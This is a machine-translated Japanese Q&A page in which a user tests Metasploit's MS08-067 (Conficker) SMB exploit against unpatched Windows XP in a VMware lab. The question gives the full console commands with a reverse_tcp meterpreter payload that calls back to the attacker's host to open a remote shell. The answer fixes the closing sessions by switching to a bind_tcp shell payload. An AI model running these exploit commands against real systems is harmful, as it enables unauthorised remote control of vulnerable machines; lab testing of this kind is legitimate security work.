web-dev-qa-db-ja.com

Metasploitを使用して、ConfickerからSMB=を悪用します

SP0/unpatched Windows XPこれは、Confickerワームに対して脆弱です。リモートシェル/コマンドラインを開く目的でmetasploitを使用してConfickerエクスプロイトを使用しています。

私のMetasploitスクリプトは次のとおりです。

use exploit/windows/smb/ms08_067_netapi
set RHOST <vulnerable_win_xp_ip>
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <attacking_kali_Host_ip>
set LPORT <local_port>
exploit -j -z

私の場合、192.168.239.*LPORT = 443のアドレスを持つマシンがあります。

このようにして、リモートの脆弱なマシン(sessions -i 1)とのセッションを開いて、コマンドラインアプリケーション(execute -i -f cmd.exe)を実行し、リモートコマンドラインを取得できるはずです。

それにもかかわらず、スクリプトを実行すると、Meterpreterが被害者とのセッションを開いているにもかかわらず、このセッションは数秒後に閉じられます(理由:終了)。

私は found をテスト中に2つのVMWare仮想マシンを使用しているという事実に関連している可能性があることを発見しました。
提案どおり、set InitialAutoRunScript migrate -fを試しましたが、何も変わりません。

Meterpreterセッションが閉じられないようにするにはどうすればよいですか?
そして、最も重要なのは、なぜ彼らは閉鎖されているのですか?

1
auino

Metasploitで使用されるペイロードを変更することで解決しました。特に、bind_tcpペイロードMeterpreter接続が数秒後に閉じられなくなり、リモートのシェル/コマンドラインが表示されます。

use windows/smb/ms08_067_netapi
set PAYLOAD windows/Shell/bind_tcp
set RHOST <vulnerable_win_xp_ip>
show targets
set TARGET <n>
run

私の場合 <n> = 2ですが、通常は前のステップによって異なります。

1
auino